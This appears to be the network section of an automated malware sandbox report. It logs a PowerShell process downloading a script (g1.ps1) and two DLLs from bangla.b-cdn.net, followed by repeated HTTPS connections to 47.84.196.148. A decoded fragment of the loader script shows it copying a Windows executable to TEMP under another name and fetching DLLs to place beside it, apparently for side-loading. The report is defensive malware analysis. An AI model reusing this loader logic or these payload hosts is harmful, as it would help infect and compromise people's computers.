                                                  Dec 19, 2024 13:37:21.522357941 CET4434992747.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:37:21.556420088 CET49927443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:37:21.556581020 CET49927443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:37:21.556643009 CET4434992747.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:37:22.410813093 CET4434992747.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:37:22.410919905 CET4434992747.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:37:22.411001921 CET49927443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:37:22.411108017 CET49927443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:37:22.411108017 CET49927443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:37:22.411129951 CET4434992747.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:37:22.411142111 CET4434992747.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:37:44.968177080 CET49985443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:37:44.968225956 CET4434998547.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:37:44.968321085 CET49985443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:37:44.968856096 CET49985443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:37:44.968873024 CET4434998547.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:37:46.650933981 CET4434998547.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:37:46.651021957 CET49985443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:37:46.653049946 CET49985443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:37:46.653059006 CET4434998547.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:37:46.653337955 CET4434998547.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:37:46.691617012 CET49985443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:37:46.691687107 CET49985443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:37:46.692004919 CET4434998547.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:37:47.552505970 CET4434998547.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:37:47.552601099 CET4434998547.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:37:47.552809000 CET49985443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:37:47.553894997 CET49985443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:37:47.553894997 CET49985443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:37:47.553913116 CET4434998547.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:37:47.553922892 CET4434998547.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:38:10.607677937 CET50013443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:38:10.607738972 CET4435001347.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:38:10.607803106 CET50013443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:38:10.608161926 CET50013443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:38:10.608176947 CET4435001347.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:38:12.292097092 CET4435001347.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:38:12.296469927 CET50013443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:38:12.296505928 CET4435001347.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:38:12.297063112 CET50013443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:38:12.297069073 CET4435001347.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:38:12.297096014 CET50013443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:38:12.297099113 CET4435001347.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:38:13.117785931 CET4435001347.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:38:13.117861986 CET4435001347.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:38:13.117913008 CET50013443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:38:13.118174076 CET50013443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:38:13.118191957 CET4435001347.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:38:43.192178011 CET50014443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:38:43.192214966 CET4435001447.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:38:43.192332029 CET50014443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:38:43.192717075 CET50014443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:38:43.192728043 CET4435001447.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:38:44.866269112 CET4435001447.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:38:44.866458893 CET50014443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:38:44.868093014 CET50014443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:38:44.868103027 CET4435001447.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:38:44.868359089 CET4435001447.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:38:44.903004885 CET50014443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:38:44.903021097 CET50014443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:38:44.903095961 CET4435001447.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:38:45.749507904 CET4435001447.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:38:45.749598026 CET4435001447.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:38:45.751884937 CET50014443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:38:45.751959085 CET50014443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:38:45.751986027 CET4435001447.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:38:45.752062082 CET50014443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:38:45.752067089 CET4435001447.84.196.148192.168.2.4

                                                  UDP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Dec 19, 2024 13:35:03.407418013 CET6281453192.168.2.41.1.1.1
                                                  Dec 19, 2024 13:35:03.644972086 CET53628141.1.1.1192.168.2.4

                                                  DNS Queries

                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                  Dec 19, 2024 13:35:03.407418013 CET192.168.2.41.1.1.10x2701Standard query (0)bangla.b-cdn.netA (IP address)IN (0x0001)false

                                                  DNS Answers

                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                  Dec 19, 2024 13:35:03.644972086 CET1.1.1.1192.168.2.40x2701No error (0)bangla.b-cdn.net89.35.237.170A (IP address)IN (0x0001)false

                                                  HTTP Request Dependency Graph

                                                  • bangla.b-cdn.net
                                                  • 47.84.196.148

                                                  HTTP Packets

                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  0192.168.2.44973089.35.237.170807736C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 19, 2024 13:35:03.780405998 CET167OUTGET /g1.ps1 HTTP/1.1
                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                  Host: bangla.b-cdn.net
                                                  Connection: Keep-Alive
                                                  Dec 19, 2024 13:35:05.215027094 CET377INHTTP/1.1 301 Moved Permanently
                                                  Date: Thu, 19 Dec 2024 12:35:04 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 162
                                                  Connection: keep-alive
                                                  Server: BunnyCDN-RI1-892
                                                  CDN-PullZone: 3104411
                                                  CDN-Uid: 73bf0b00-2886-453c-ad69-38229cfc7e90
                                                  CDN-RequestCountryCode: US
                                                  Location: https://bangla.b-cdn.net/g1.ps1
                                                  CDN-RequestTime: 3
                                                  CDN-RequestId: 935b33b2a9468066a0cbc683f6334969
                                                  Dec 19, 2024 13:35:05.458525896 CET162INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31
                                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  1192.168.2.44973289.35.237.170807736C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 19, 2024 13:35:08.143022060 CET149OUTGET /onedrive.dll HTTP/1.1
                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                  Host: bangla.b-cdn.net
                                                  Dec 19, 2024 13:35:09.560062885 CET545INHTTP/1.1 301 Moved Permanently
                                                  Date: Thu, 19 Dec 2024 12:35:09 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 162
                                                  Connection: keep-alive
                                                  Server: BunnyCDN-RI1-892
                                                  CDN-PullZone: 3104411
                                                  CDN-Uid: 73bf0b00-2886-453c-ad69-38229cfc7e90
                                                  CDN-RequestCountryCode: US
                                                  Location: https://bangla.b-cdn.net/onedrive.dll
                                                  CDN-RequestTime: 1
                                                  CDN-RequestId: a474458c9503ef0abc31ab760a503b21
                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>
                                                  Dec 19, 2024 13:35:12.302375078 CET145OUTGET /sppc.dll HTTP/1.1
                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                  Host: bangla.b-cdn.net
                                                  Dec 19, 2024 13:35:12.781531096 CET541INHTTP/1.1 301 Moved Permanently
                                                  Date: Thu, 19 Dec 2024 12:35:12 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 162
                                                  Connection: keep-alive
                                                  Server: BunnyCDN-RI1-892
                                                  CDN-PullZone: 3104411
                                                  CDN-Uid: 73bf0b00-2886-453c-ad69-38229cfc7e90
                                                  CDN-RequestCountryCode: US
                                                  Location: https://bangla.b-cdn.net/sppc.dll
                                                  CDN-RequestTime: 0
                                                  CDN-RequestId: 99090e4c8afe84a87363c15b798facd8
                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                  HTTPS Proxied Packets

                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  0192.168.2.44973189.35.237.1704437736C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-19 12:35:07 UTC167OUTGET /g1.ps1 HTTP/1.1
                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                  Host: bangla.b-cdn.net
                                                  Connection: Keep-Alive
                                                  2024-12-19 12:35:07 UTC670INHTTP/1.1 200 OK
                                                  Date: Thu, 19 Dec 2024 12:35:07 GMT
                                                  Content-Type: application/octet-stream
                                                  Content-Length: 487
                                                  Connection: close
                                                  Server: BunnyCDN-RI1-892
                                                  CDN-PullZone: 3104411
                                                  CDN-Uid: 73bf0b00-2886-453c-ad69-38229cfc7e90
                                                  CDN-RequestCountryCode: US
                                                  Cache-Control: max-age=25600000
                                                  ETag: "676293cc-1e7"
                                                  Last-Modified: Wed, 18 Dec 2024 09:20:12 GMT
                                                  CDN-StorageServer: DE-679
                                                  CDN-FileServer: 1004
                                                  CDN-ProxyVer: 1.06
                                                  CDN-RequestPullSuccess: True
                                                  CDN-RequestPullCode: 200
                                                  CDN-CachedAt: 12/19/2024 12:35:07
                                                  CDN-EdgeStorageId: 892
                                                  CDN-Status: 200
                                                  CDN-RequestTime: 2
                                                  CDN-RequestId: 2f3cb78fa05eb60c5199d1498c16a126
                                                  CDN-Cache: MISS
                                                  Accept-Ranges: bytes
                                                  2024-12-19 12:35:07 UTC487INData Raw: 24 75 72 6c 32 20 3d 20 27 62 61 6e 67 6c 61 2e 62 2d 63 64 6e 2e 6e 65 74 2f 6f 6e 65 64 72 69 76 65 2e 64 6c 6c 27 3b 20 24 75 72 6c 33 20 3d 20 27 62 61 6e 67 6c 61 2e 62 2d 63 64 6e 2e 6e 65 74 2f 73 70 70 63 2e 64 6c 6c 27 3b 24 73 6f 75 72 63 65 20 3d 20 22 43 3a 5c 57 69 6e 64 6f 77 73 5c 53 79 73 74 65 6d 33 32 5c 70 68 6f 6e 65 61 63 74 69 76 61 74 65 2e 65 78 65 22 3b 20 24 64 65 73 74 69 6e 61 74 69 6f 6e 20 3d 20 4a 6f 69 6e 2d 50 61 74 68 20 24 65 6e 76 3a 54 45 4d 50 20 22 4f 6e 65 64 72 69 76 65 2e 65 78 65 22 3b 20 24 6f 75 74 70 75 74 50 61 74 68 32 20 3d 20 24 65 6e 76 3a 54 45 4d 50 20 2b 20 27 5c 6f 6e 65 64 72 69 76 65 2e 64 6c 6c 27 3b 20 24 6f 75 74 70 75 74 50 61 74 68 33 20 3d 20 24 65 6e 76 3a 54 45 4d 50 20 2b 20 27 5c 73 70 70
                                                  Data Ascii: $url2 = 'bangla.b-cdn.net/onedrive.dll'; $url3 = 'bangla.b-cdn.net/sppc.dll';$source = "C:\Windows\System32\phoneactivate.exe"; $destination = Join-Path $env:TEMP "Onedrive.exe"; $outputPath2 = $env:TEMP + '\onedrive.dll'; $outputPath3 = $env:TEMP + '\spp


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  1192.168.2.44973389.35.237.1704437736C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-19 12:35:11 UTC149OUTGET /onedrive.dll HTTP/1.1
                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                  Host: bangla.b-cdn.net
                                                  2024-12-19 12:35:11 UTC674INHTTP/1.1 200 OK
                                                  Date: Thu, 19 Dec 2024 12:35:11 GMT
                                                  Content-Type: application/octet-stream
                                                  Content-Length: 103935
                                                  Connection: close
                                                  Server: BunnyCDN-RI1-892
                                                  CDN-PullZone: 3104411
                                                  CDN-Uid: 73bf0b00-2886-453c-ad69-38229cfc7e90
                                                  CDN-RequestCountryCode: US
                                                  Cache-Control: max-age=25600000
                                                  ETag: "67629393-195ff"
                                                  Last-Modified: Wed, 18 Dec 2024 09:19:15 GMT
                                                  CDN-StorageServer: DE-51
                                                  CDN-FileServer: 1023
                                                  CDN-ProxyVer: 1.06
                                                  CDN-RequestPullSuccess: True
                                                  CDN-RequestPullCode: 200
                                                  CDN-CachedAt: 12/19/2024 12:35:11
                                                  CDN-EdgeStorageId: 892
                                                  CDN-Status: 200
                                                  CDN-RequestTime: 0
                                                  CDN-RequestId: 8f798816014220dfc16e7cc7464dcd65
                                                  CDN-Cache: MISS
                                                  Accept-Ranges: bytes
                                                  2024-12-19 12:35:11 UTC15577INData Raw: b5 c1 04 0c 55 f0 75 07 79 fc d1 a8 79 c6 1e 66 04 1a 41 e1 e6 cc d5 db 56 f7 ef bb db 2a 7e 8f d3 22 66 76 2e 07 b3 39 82 d1 b4 07 f7 8b ef 50 63 b2 a4 7f 56 36 06 50 d4 78 09 2f 30 3b e4 50 8c 19 68 bd b8 0a 29 10 47 7a be 48 a6 cc 3b 5f e9 29 81 bf 9d db f7 c9 a5 73 28 6c 18 1d 8f c0 1b 79 68 9b b7 56 dc fa 4c 99 8a 63 ec 18 23 54 6a dd 1b 13 0b 3c 62 7f f6 93 fd 27 f0 61 a5 f5 33 da c7 16 03 7c da 99 57 b4 93 da f2 56 79 e4 c6 6b d2 a0 22 ed db ce ba 1f 39 d8 ed 7d 55 22 34 0d b0 f9 40 30 5a 34 5e eb 2d 05 dc 2d a5 db e6 f9 11 9c 2a 0b 23 8d a5 0b c6 a9 11 97 41 a7 c6 75 0e 92 93 92 a7 b9 f6 17 64 ab 37 17 18 a9 bc 0e 11 ff 7e 4e 81 a5 e6 c0 c1 78 df 4b 09 35 09 71 17 3d 06 a9 ae 26 3d 4e 3a c6 e5 17 34 b6 3c a6 92 9b 69 90 24 36 bd 34 9c 8b a2 f4 db
                                                  Data Ascii: UuyyfAV*~"fv.9PcV6Px/0;Ph)GzH;_)s(lyhVLc#Tj<b'a3|WVyk"9}U"4@0Z4^--*#Aud7~NxK5q=&=N:4<i$64
                                                  2024-12-19 12:35:12 UTC16384INData Raw: a1 3c 61 aa 16 a8 17 96 3a c2 ba e9 8a 61 85 a5 0f 83 7c 35 03 c9 44 74 6d 97 4f 28 6a 63 d7 b8 69 32 ff 6f c9 f6 51 39 18 85 00 ed dd 34 ea 2c cf 15 0e 28 ae 47 1e 88 3f d6 16 b5 77 2a 22 86 38 72 78 bd 0a 24 c1 3b ff b3 1d f3 a4 77 1f 3e 59 83 86 bc 6e 08 f8 d1 b9 01 79 21 ba 6f bd ba 81 01 b4 e2 d8 11 93 4b 37 c3 61 39 21 23 90 23 9b 31 ff fb e4 f0 a7 6a 18 43 53 ce 33 91 10 c7 44 c1 04 cd 8d 42 e1 b4 22 53 6c c1 21 da 7a fc 40 19 10 e4 82 ae d6 f0 89 c6 1e 6f 90 e4 04 ef d7 06 48 26 f8 d9 29 e0 8a 48 2b cd 20 ab ab ac 32 7e 0b 34 3f de 12 78 ca 16 68 44 20 22 e3 1e 54 29 8a 00 a5 a8 94 d9 df fa 39 29 ed c5 00 92 77 d8 78 1e a3 47 c2 7c 72 47 be c3 71 61 17 88 c9 55 7d cf b8 c9 56 32 3b 2a 7a 33 89 a4 c7 22 52 84 17 60 c6 dd f0 21 0b 51 61 40 de f7 e3
                                                  Data Ascii: <a:a|5DtmO(jci2oQ94,(G?w*"8rx$;w>Yny!oK7a9!##1jCS3DB"Sl!z@oH&)H+ 2~4?xhD "T)9)wxG|rGqaU}V2;*z3"R`!Qa@
                                                  2024-12-19 12:35:12 UTC16384INData Raw: fe 6c 15 05 a3 2b 6d b3 e9 a5 3d a7 5b 9f a9 3f 44 81 c2 26 2c b6 fa e5 91 c0 98 e9 89 85 6b e6 42 68 07 ed cc 41 5b de b2 a5 d3 b7 ff ea 65 3a f4 da 31 bb db 14 e8 3e 47 a9 71 8e 6d dc a4 4b 8c 9d c3 9b 1b 10 b8 89 3f bc 09 3e b6 fa fa 48 1d 92 9e e8 07 80 3f 56 05 ae bc a9 f9 b0 37 53 21 c0 3d 77 b6 ee 36 47 d6 c6 5c 4f 89 f2 1c c4 78 c8 06 5b c0 38 cc 1b 5e fe de da a0 5c 33 13 81 18 3b 7b 00 5a c0 ff f6 28 21 5b 66 47 8c 54 4c b9 d0 9c 4d df 8c 2e c0 e6 c4 46 ad 7b 45 8f 7e 9b b5 21 ec c2 35 ac e2 a4 53 d3 16 fb 9e 55 d1 95 cd 82 29 0d 46 ae 21 bc 31 e9 56 4d f1 bf 34 fa 60 0d 33 69 6f 91 85 19 49 b3 56 4b 62 ff 9d 65 08 c4 1d cf a4 bc 08 d0 2f 95 bc 89 92 17 3a e1 22 35 5d f5 c4 f5 08 6e 32 bc 88 58 60 98 dc 64 40 3d 8e fe ae b9 0c 14 1c 32 ab cf 8b
                                                  Data Ascii: l+m=[?D&,kBhA[e:1>GqmK?>H?V7S!=w6G\Ox[8^\3;{Z(![fGTLM.F{E~!5SU)F!1VM4`3ioIVKbe/:"5]n2X`d@=2
                                                  2024-12-19 12:35:12 UTC16384INData Raw: fc 92 8d a7 e9 97 29 92 78 52 97 74 52 64 8e 7a 68 5d f1 8f a6 53 97 7b 52 78 ca fc fa de 33 c0 50 6a de 8a dc a1 e2 68 bc 5e 23 ed fa 70 a6 a1 97 1d 80 5b d2 ee fd 63 e2 08 cd 75 5e fd 49 41 47 7d 00 72 18 49 fc 24 32 6d 52 d6 c6 4e 7b 59 e2 1c af fa 9d d5 c5 4d c2 16 d5 90 a8 19 78 dd c4 ae 91 42 cc f4 8e 66 1d 8c a2 9e 01 b7 13 17 45 e8 94 c8 33 29 ac 74 48 20 7c cc b5 cf 15 28 50 ca 33 18 3d 8f d6 36 e4 48 fa ea 4c 85 ac ab 08 fa e1 fa 03 5c 05 eb d9 d9 30 16 d7 00 32 5b 0d 01 30 f5 80 9e fd 5e ad af 6b 91 65 28 ad f3 63 d6 a9 7c fd 2c 51 32 3c 2c ab a4 75 d8 3a ee c3 dc 1e 72 6c f0 70 cc d1 51 20 19 47 93 93 46 58 3c bb 59 42 94 0f 2b 40 84 64 6a 74 7f d9 6b fe 8d d4 eb 0f b1 a8 2c a1 e2 0f 9e 00 7b 5e 8f 8d 8d 76 c2 46 00 99 6a df 0d dc 0e 87 e1 71
                                                  Data Ascii: )xRtRdzh]S{Rx3Pjh^#p[cu^IAG}rI$2mRN{YMxBfE3)tH |(P3=6HL\02[0^ke(c|,Q2<,u:rlpQ GFX<YB+@djtk,{^vFjq
                                                  2024-12-19 12:35:12 UTC16384INData Raw: 9e 31 77 e6 04 91 4f d7 c4 7d 97 5c df b4 76 15 6f 08 85 dd 01 5e 07 e5 a9 22 24 1b f3 06 02 ed 82 6c 27 c5 e7 36 8d 77 3e 7c 93 72 94 29 67 f8 ea 54 57 3c 72 8d e9 ec 03 15 58 22 d3 2f 5d 80 82 04 d1 d5 e9 18 f0 0f 3a 93 18 72 9a 76 82 ed 2f d6 d4 41 4f 18 a9 e0 1f 4a 14 45 7d e9 93 04 d4 6f 73 4d 25 1b d0 25 17 de a9 21 0a c3 6a a4 9e ad a4 e8 1a e5 1e 8d 8c 06 b4 6c 3f b8 58 0e 4e 9a 60 95 1a c2 48 13 d2 2b 97 3f 1f 0c 39 63 4d 42 a4 8d 3e 6f 32 43 b1 52 0f b7 16 ab c3 ce 4f 8a 5e b1 7c f3 6b 4e bc 00 e8 ba 84 fc 5c 56 3b 69 76 97 58 86 84 2f 0d 93 a5 d1 9e 40 3a ee 6f e4 80 87 47 03 78 3b 65 5f 01 97 9f fc 21 b2 a6 dc 30 79 60 f2 dc fe d9 f2 c7 23 0d ae 6c 9d 37 a4 dd 5e 09 29 0f e6 7e 43 7f 72 59 c6 ff 30 e9 6b ff cc a2 9c 90 e5 33 fa bf 34 68 b6 76
                                                  Data Ascii: 1wO}\vo^"$l'6w>|r)gTW<rX"/]:rv/AOJE}osM%%!jl?XN`H+?9cMB>o2CRO^|kN\V;ivX/@:oGx;e_!0y`#l7^)~CrY0k34hv
                                                  2024-12-19 12:35:12 UTC16384INData Raw: 54 0b 3a e6 4e 1a 34 25 96 1b 79 b6 95 54 db cd dc 6f da 2f fc 2d 79 7f 43 7f 7d c1 23 14 c3 cb 47 e1 01 83 03 a3 8f a2 2c 6d 6b 6d 49 ed 98 08 e7 54 46 5d db b6 3e aa a9 5c 29 5d 37 08 75 0c 64 bd d6 1f f5 64 c5 75 b4 09 f7 f6 5c 74 5b 1a 0b e3 51 2b 14 ee f3 65 22 d8 57 28 ce 9a 66 51 64 e8 fd cf 89 7a 4e 56 43 2c 2b df 36 77 f4 8a 3e 18 49 8f 73 36 8a 2f 12 45 29 07 1a 0a 49 a3 6d b9 bb 21 96 e5 6a a9 51 16 f0 29 ca ab eb 85 48 0c 66 ec 29 70 3c 7f 82 23 d9 5c 17 40 65 c4 7a 68 c0 37 87 83 e0 78 a9 ad ec ea e2 ec ee 4c 9f a7 ec c0 ea ef ad b1 fe fd 85 e1 08 66 96 12 00 53 10 0b 53 88 b8 94 81 cd 95 ca a4 60 20 e0 df fc dc 65 c4 d5 28 8f 48 eb 14 c9 80 12 62 c1 99 61 39 59 04 ff d4 8b 3d 85 16 28 90 8a 03 7f d1 a1 ef 88 9d 80 c0 3d 78 60 44 c0 ea 77 b1
                                                  Data Ascii: T:N4%yTo/-yC}#G,mkmITF]>\)]7uddu\t[Q+e"W(fQdzNVC,+6w>Is6/E)Im!jQ)Hf)p<#\@ezh7xLfSS` e(Hba9Y=(=x`Dw
                                                  2024-12-19 12:35:12 UTC6438INData Raw: 83 31 aa 15 fb 26 07 6a 15 47 a5 c0 78 d9 32 2a 49 cd 1a 3f 8d 73 65 de 3c 48 e6 89 57 4f eb 21 01 98 36 46 05 df 55 48 d8 db fe f3 6f 75 6e dc c8 f1 3a 40 b6 8f 8f ed 4f 07 0b d2 23 95 b0 6b fb bc c0 7d 80 d0 a4 1f c4 8f 7b 16 d1 02 69 f8 da ca b5 a7 fe 33 10 6d d8 87 74 79 74 7c 26 9b 87 1f d3 bd b1 23 f3 13 6c 18 5d 3c d9 a4 4a e0 11 53 14 f7 12 16 3e fb c4 1f bc 32 1c f3 b9 e9 02 1c c6 e5 24 68 fa f0 7e d4 29 ab b7 36 02 cf 9f fe 36 4b 8e 05 1d 94 d9 02 30 2b ec 4a 6a 67 65 ce db 33 1a 2c fa 5a 26 ea 67 2f ee ed 09 01 c2 99 45 96 ca 45 05 c9 04 b6 08 c5 cc b2 bd 80 df 9c 16 d5 44 57 da 7a 12 0a 29 10 57 65 7c f9 93 2a 0e 29 d6 65 17 10 46 e3 79 e0 70 b5 3c de 45 10 1d a6 cc 3f 0e f9 7d ea c7 29 18 40 5b 7d 2f aa 72 96 36 25 01 71 3e c2 64 0f 7f 91 8c
                                                  Data Ascii: 1&jGx2*I?se<HWO!6FUHoun:@O#k}{i3mtyt|&#l]<JS>2$h~)66K0+Jjge3,Z&g/EEDWz)We|*)eFyp<E?})@[}/r6%q>d


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  2192.168.2.44973489.35.237.1704437736C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-19 12:35:14 UTC145OUTGET /sppc.dll HTTP/1.1
                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                  Host: bangla.b-cdn.net
                                                  2024-12-19 12:35:15 UTC674INHTTP/1.1 200 OK
                                                  Date: Thu, 19 Dec 2024 12:35:14 GMT
                                                  Content-Type: application/octet-stream
                                                  Content-Length: 371712
                                                  Connection: close
                                                  Server: BunnyCDN-RI1-892
                                                  CDN-PullZone: 3104411
                                                  CDN-Uid: 73bf0b00-2886-453c-ad69-38229cfc7e90
                                                  CDN-RequestCountryCode: US
                                                  Cache-Control: max-age=25600000
                                                  ETag: "67629392-5ac00"
                                                  Last-Modified: Wed, 18 Dec 2024 09:19:14 GMT
                                                  CDN-StorageServer: DE-587
                                                  CDN-FileServer: 976
                                                  CDN-ProxyVer: 1.06
                                                  CDN-RequestPullSuccess: True
                                                  CDN-RequestPullCode: 200
                                                  CDN-CachedAt: 12/19/2024 12:35:14
                                                  CDN-EdgeStorageId: 892
                                                  CDN-Status: 200
                                                  CDN-RequestTime: 2
                                                  CDN-RequestId: 13aaa1e16c9d036054fceb5edc545768
                                                  CDN-Cache: MISS
                                                  Accept-Ranges: bytes
